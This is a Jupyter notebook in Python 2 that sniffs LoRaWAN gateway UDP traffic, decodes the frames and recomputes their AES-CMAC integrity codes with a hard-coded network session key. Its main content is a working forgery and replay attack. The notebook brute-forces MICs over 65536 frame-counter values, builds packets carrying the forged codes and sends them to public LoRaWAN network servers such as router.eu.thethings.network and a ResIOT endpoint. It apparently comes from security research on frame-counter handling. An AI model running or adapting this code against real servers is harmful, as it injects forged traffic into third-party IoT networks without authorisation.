In [1]:
import struct
import base64
from scapy.all import *
import binascii
import json
from Cryptodome.Cipher import AES
from Cryptodome.Hash import CMAC
import socket

# from Crypto import *

In [2]:
def processGwPacket(packet):
#     print type(packet[Raw]), 
    packetLen=len(str(packet[Raw]))
    if packetLen > 200: #we received a lora packet
#         print packet.summary()
        packed_data=binascii.unhexlify(str(packet[Raw]).encode('hex'))
        s=struct.Struct('b 2s b 8s ' + str(packetLen-12) + 's')
        typ, tok, something, gwID, jsonPayload = s.unpack(packed_data)
#         typ= unpacked_data[0]
#         tok= unpacked_data[1]
#         something= unpacked_data[2]
#         gwID=unpacked_data[3]
        jsonPayload = json.loads(jsonPayload)
        return decodeLoraWAN(jsonPayload)
#         print typ, tok, something, gwID, jsonPayload
#     print str(packet[Raw])

#constants
MHDR_len=1
MIC_len=4
DevAddr_len=4
FCtrl_len=1
FCnt_len=2
FOpts_len=0 #optional, up to 15? Its size is found in bits FCnt[0:3]
FPort_len=1 #optional, 0 or 1. If the frame payload field is not empty, the port field MUST be present.


def decodeLoraWAN(payload):
    '''
        * PHYPayload    (MHDR | MACPayload | MIC)
        * MACPayload    (FHDR | FPort | FRMPayload)
        * FHDR          (DevAddr | FCtrl | FCnt | FOpts)
        In the end: MHDR|DevAddr|FCtrl|FCnt|FOpts|FPort|FRMPayload|MIC
        '''
    for receivedPacket in payload['rxpk']:
        decodedData = base64.b64decode(receivedPacket['data'])
        try:
        #     print decodedData.encode('hex')

            FRMPayload_len=len(decodedData)-13

        #     s = struct.Struct(str(MHDR_len)+'s'+ str(DevAddr_len)+'s' + str(FCtrl_len)+'s' + str(FCnt_len)+'s' + str(FPort_len)+'s' + str(FRMPayload_len)+'s' + str(MIC_len)+'s')
            s = struct.Struct(str(MHDR_len)+'s'+ str(DevAddr_len)+'s' + str(FCtrl_len)+'s' + str(FCnt_len)+'s' + str(FPort_len)+'s' + str(FRMPayload_len)+'s' + str(MIC_len)+'s')

            MHDR, DevAddr, FCtrl, FCnt, FPort,FRMPayload, MIC = s.unpack(binascii.unhexlify(decodedData.encode('hex')))

            print "MHDR:" + MHDR.encode('hex'),
            print "DevAddr:" + DevAddr.encode('hex'),
            print "FCtrl:" +FCtrl.encode('hex'),
            print "FCnt:" + str(struct.unpack('<H', FCnt)[0]),
            print "FPort:" +FPort.encode('hex'),
            print "FRMPayload:" +FRMPayload.encode('hex'),
            print "MIC:" +MIC.encode('hex')
            return (MHDR, DevAddr, FCtrl, FCnt, FPort,FRMPayload, MIC)
        except Exception as e:
            print e
            print "Data received was:"+ decodedData.encode('hex')
        



def calculateMIC_fromRx(NwkSKey, payload, DevAddr,FCntUp):
    '''
    Size (bytes): 1 4 1 4 4 1 1
    B0: 0x49 | 4 x 0x00 | Dir|  DevAddr |FCntUp or FCntDown | 0x00|len(msg)
    aes128_cmac(NwkSKey, B0 | MHDR | FHDR | FPort | FRMPayload)
    '''
    Dir = "00" #uplink:00, downlink=01
    len_payload= format(len(payload)/2-4,'02x') #convert int to 2byte ascii hex
    if len(FCntUp)==4:
        FCntUp = FCntUp+'0000' #B0 expects a 4 byte FCntUp
    B0="49" + 4*"00" + Dir + DevAddr + FCntUp + "00" + len_payload
#     print B0
#     print "rx payload:",payload
#     print "rx MIC:", payload[-4*2:]
#     print "rx payload without MIC:", payload[0:-8]
    MACobject = CMAC.new(binascii.unhexlify(NwkSKey), ciphermod=AES) #     cmac = aes128_cmac(NwkSKey, B0 | msg)
    MACobject.update(binascii.unhexlify(B0+payload[0:-4*2])) 
#     print MACobject.hexdigest()
    
    MIC = MACobject.hexdigest()[0:4*2]
#     print MIC
    return MIC
        
'''
40322c2300000900015dc971be4fb4
MHDR:40 DevAddr:322c2300 FCtrl:00 FCnt:9 FPort:01 FRMPayload:5dc9 MIC:71be4fb4
'''
def calculateMIC_forTx(NwkSKey, payload, DevAddr,FCntUp):
    '''
    Size (bytes): 1 4 1 4 4 1 1
    B0: 0x49 | 4 x 0x00 | Dir|  DevAddr |FCntUp or FCntDown | 0x00|len(msg)
    aes128_cmac(NwkSKey, B0 | MHDR | FHDR | FPort | FRMPayload)
    
    Example: calculateMIC_forTx('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload='40322c2300000900015dc9',DevAddr='322c2300',FCntUp='09000000' )

    '''
    Dir = "00" #uplink:00, downlink=01
    len_payload= format(len(payload)/2,'02x') #convert int to 2byte ascii hex
    if len(FCntUp)==4:
        FCntUp = FCntUp+'0000' #B0 expects a 4 byte FCntUp
    B0="49" + 4*"00" + Dir + DevAddr + FCntUp + "00" + len_payload
#     print B0
#     print "tx payload:",payload
    MACobject = CMAC.new(binascii.unhexlify(NwkSKey), ciphermod=AES)
    MACobject.update(binascii.unhexlify(B0+payload)) #cmac = aes128_cmac(NwkSKey, B0 | msg)
#     print MACobject.hexdigest()
    
    MIC = MACobject.hexdigest()[0:4*2]
#     print MIC
    return MIC

# calculateMIC_fromRx('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload='40322c2300000900015dc971be4fb4',DevAddr='322c2300',FCntUp='0900' )
# calculateMIC_fromRx('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload='40322c2300000900015dc971be4fb4',DevAddr='322c2300',FCntUp='09000000' )
# calculateMIC_forTx('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload='40322c2300000900015dc9',DevAddr='322c2300',FCntUp='09000000' )
def bruteforceMIC(NwkSKey,payload,FCntUp):
    '''Arguments should be in ascii hex, payload should not include the MIC '''
    if len(FCntUp)>4:
        FCntUp=FCntUp[0:4]
    DevAddr=payload[2:2+4*2]
    print "Bruteforcing MICs for DevAddr:{}, 2 byte FCntUp:{}".format(DevAddr,FCntUp)
#     lsb = [format(LSB, '04x') for LSB in range(65536)]
#     print lsb
#     listOfMICs = [calculateMIC_forTx(NwkSKey,payload,DevAddr,FCntUp+format(LSB, '04x')) for LSB in range(65536)] # unordered MICs
    listOfMICs = [calculateMIC_forTx(NwkSKey,payload,DevAddr,FCntUp+format(struct.unpack('<H',binascii.unhexlify(format(LSB, '04x')))[0],'04x'))  for LSB in range(65536)] #ordered MICs, little endian encoded
    return listOfMICs


def forwardGwPacket(server,packet,port=1700):
# #     print packet[Raw]
# #     print packet.summary()
# #     print packet
# #     print ls(packet)
    
#     packet[IP].dst=server
# #     print packet.summary()
# #     print "IP:\n",ls(packet[IP])
# #     print "UDP:\n",ls(packet[UDP])
#     print ls(IP(dst=server)/packet[UDP])
#     send(IP(dst=server)/packet[UDP])
    DST_IP = server
    UDP_PORT = port
    MESSAGE = str(packet[Raw])
    print str(MESSAGE)
    sock = socket.socket(socket.AF_INET, # Internet
                         socket.SOCK_DGRAM) # UDP
    sock.sendto(MESSAGE, (DST_IP, UDP_PORT))
    sock.close()
def forwardGwPackets(server,packets, port=1700):
    DST_IP = server
    UDP_PORT = port
    sock = socket.socket(socket.AF_INET, # Internet
                         socket.SOCK_DGRAM) # UDP
    for packet in packets:
        MESSAGE = str(packet[Raw])
        sock.sendto(MESSAGE, (DST_IP, UDP_PORT))
    sock.close()
def forwardGwPackets_allServers(servers,packet,ports):
    for i in range(len(servers)):
        forwardGwPacket(server=servers[i],packet=packet,port=ports[i])

In [27]:


# listOfMICs = bruteforceMIC('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload='40322c2300000900015dc9',FCntUp='0900')
# print len(listOfMICs), len(set(listOfMICs))

In [3]:
'''Choose your server carefully'''
# sniff(prn = lambda packet: forwardGwPackets(server="eu1.loriot.io", packets=packet,port=1780), filter = "(dst host 192.168.1.101) and (udp and dst port 1700)",iface=ifaces.dev_from_index(11))
# sniff(prn = lambda packet: forwardGwPacket(server="router.eu.thethings.network",packet=packet), filter = "(dst host 192.168.1.101) and (udp and dst port 1700)",iface=ifaces.dev_from_index(11))
sniff(prn = lambda packet: forwardGwPackets(server="eu72udp.resiot.io", packets=packet,port=7677), filter = "(dst host 192.168.1.101) and (udp and dst port 1700)",iface=ifaces.dev_from_index(11))
# sniff(prn = lambda packet: forwardGwPackets_allServers(servers=["router.eu.thethings.network","eu1.loriot.io", "eu72udp.resiot.io"], packet=packet,ports=[1700,1780,7677]), filter = "(dst host 192.168.1.101) and (udp and dst port 1700)",iface=ifaces.dev_from_index(11))


<Sniffed: TCP:0 UDP:0 ICMP:0 Other:0>

In [4]:
'''Use to capture a LoRaWAN packet coming from the gateway'''
sniff(prn= lambda x: x.summary(), filter = "(dst host 192.168.1.101) and (udp and dst port 1700)",iface=ifaces.dev_from_index(11))

<Sniffed: TCP:0 UDP:0 ICMP:0 Other:0>

In [153]:
test = _
lorapackets = [a for a in test if len(str(a[Raw]))>200]
print len(lorapackets)
# print "1a00".encode('hex')
# print "FCnt:" +str(struct.Struct('<H').unpack(binascii.unhexlify("1a00".decode('hex').encode('hex')))[0])

# print len('40322c2300000900015dc971be4fb4')
for lora in lorapackets:
    processGwPacket(lora)
nicepacket=lorapackets[0]

In [16]:
#in case kernel shuts down:
nicepacket = (Ether)(binascii.unhexlify('9c4e3674332c7076ff0202530800450000fa9d2a4000401118a7c0a8016cc0a80165b64c06a400e64c4a026973007276ff00390301ef7b227278706b223a5b7b22746d7374223a353830333633362c2274696d65223a22323031382d30372d32305431343a33343a30345a222c226368616e223a362c2272666368223a312c2266726571223a3836382e3330303030302c2273746174223a312c226d6f6475223a224c4f5241222c2264617472223a22534631324257313235222c22636f6472223a22342f35222c226c736e72223a372e352c2272737369223a2d38372c2273697a65223a31342c2264617461223a22514c7752415359414577414277474f6f30656b3d227d5d7d'))
# print ls((Ether)(nicepacket))
print (nicepacket)[Raw]

is rv� 9�{"rxpk":[{"tmst":5803636,"time":"2018-07-20T14:34:04Z","chan":6,"rfch":1,"freq":868.300000,"stat":1,"modu":"LORA","datr":"SF12BW125","codr":"4/5","lsnr":7.5,"rssi":-87,"size":14,"data":"QLwRASYAEwABwGOo0ek="}]}


In [20]:
'''
steps:
extract payload without mic
extract seqno
calculate mic for seqno+65535
send payload with new mic
'''
# nicepacket
print str(nicepacket).encode('hex')
MHDR, DevAddr, FCtrl, FCnt, FPort,FRMPayload, MIC = processGwPacket(nicepacket)
payload_noMIC= MHDR.encode('hex') + DevAddr.encode('hex') + FCtrl.encode('hex') + FCnt.encode('hex') + FPort.encode('hex') + FRMPayload.encode('hex')
# print MHDR.encode('hex')
print payload_noMIC
# print calculateMIC_forTx('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload='40322c2300000900015dc9',DevAddr='322c2300',FCntUp='09000000' )
print calculateMIC_forTx('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload=payload_noMIC,DevAddr=DevAddr.encode('hex'),FCntUp=FCnt.encode('hex'))
nextMIC=calculateMIC_forTx('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload=payload_noMIC,DevAddr=DevAddr.encode('hex'),FCntUp=FCnt.encode('hex')+'0200')

print payload_noMIC + nextMIC
base64.b64encode(binascii.unhexlify(payload_noMIC + nextMIC))
#bruteforceMIC('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload=payload_noMIC,FCntUp=FCnt.encode('hex'))

# forwardGwPacket(editedNicePacket)

9c4e3674332c7076ff0202530800450000fa9d2a4000401118a7c0a8016cc0a80165b64c06a400e64c4a026973007276ff00390301ef7b227278706b223a5b7b22746d7374223a353830333633362c2274696d65223a22323031382d30372d32305431343a33343a30345a222c226368616e223a362c2272666368223a312c2266726571223a3836382e3330303030302c2273746174223a312c226d6f6475223a224c4f5241222c2264617472223a22534631324257313235222c22636f6472223a22342f35222c226c736e72223a372e352c2272737369223a2d38372c2273697a65223a31342c2264617461223a22514c7752415359414577414277474f6f30656b3d227d5d7d
MHDR:40 DevAddr:bc110126 FCtrl:00 FCnt:19 FPort:01 FRMPayload:c0 MIC:63a8d1e9
40bc11012600130001c0
63a8d1e9
40bc11012600130001c0be59a4af


'QLwRASYAEwABwL5ZpK8='

In [31]:
'''Send only 1 packet with forged MIC'''
print str(nicepacket[Raw])
# print str(nicepacket[Raw])[-24:-24+len(base64.b64encode(binascii.unhexlify(payload_noMIC + nextMIC)))]
newUDPRawPayload = str(nicepacket[Raw])[:-24]+base64.b64encode(binascii.unhexlify(payload_noMIC + nextMIC))+str(nicepacket[Raw])[-4:]
print newUDPRawPayload
editedNicePacket=Raw(newUDPRawPayload)
# print type(editedNicePacket), editedNicePacket
forwardGwPacket(server="router.eu.thethings.network", packet=editedNicePacket)


is rv� 9�{"rxpk":[{"tmst":5803636,"time":"2018-07-20T14:34:04Z","chan":6,"rfch":1,"freq":868.300000,"stat":1,"modu":"LORA","datr":"SF12BW125","codr":"4/5","lsnr":7.5,"rssi":-87,"size":14,"data":"QLwRASYAEwABwGOo0ek="}]}
is rv� 9�{"rxpk":[{"tmst":5803636,"time":"2018-07-20T14:34:04Z","chan":6,"rfch":1,"freq":868.300000,"stat":1,"modu":"LORA","datr":"SF12BW125","codr":"4/5","lsnr":7.5,"rssi":-87,"size":14,"data":"QLwRASYAEwABwL5ZpK8="}]}
is rv� 9�{"rxpk":[{"tmst":5803636,"time":"2018-07-20T14:34:04Z","chan":6,"rfch":1,"freq":868.300000,"stat":1,"modu":"LORA","datr":"SF12BW125","codr":"4/5","lsnr":7.5,"rssi":-87,"size":14,"data":"QLwRASYAEwABwL5ZpK8="}]}


In [57]:
'''Send many packets with forged MICs'''
# MICs = bruteforceMIC('AA1DF48BBG8A5BC1FE298F6C94EE37AA',payload=payload_noMIC,FCntUp=FCnt.encode('hex'))
newPackets=[]
print len(MICs)
for mic in MICs[:3]:
#     print mic
    newUDPRawPayload = str(nicepacket[Raw])[:-24]+base64.b64encode(binascii.unhexlify(payload_noMIC + mic))+str(nicepacket[Raw])[-4:]
    editedNicePacket=Raw(newUDPRawPayload)
    newPackets.append(editedNicePacket)
#     print editedNicePacket
print len(newPackets)
# forwardGwPackets(server="router.eu.thethings.network", packets=newPackets)
forwardGwPackets(server="eu72udp.resiot.io", packets=newPackets,port=7677)


65536
3
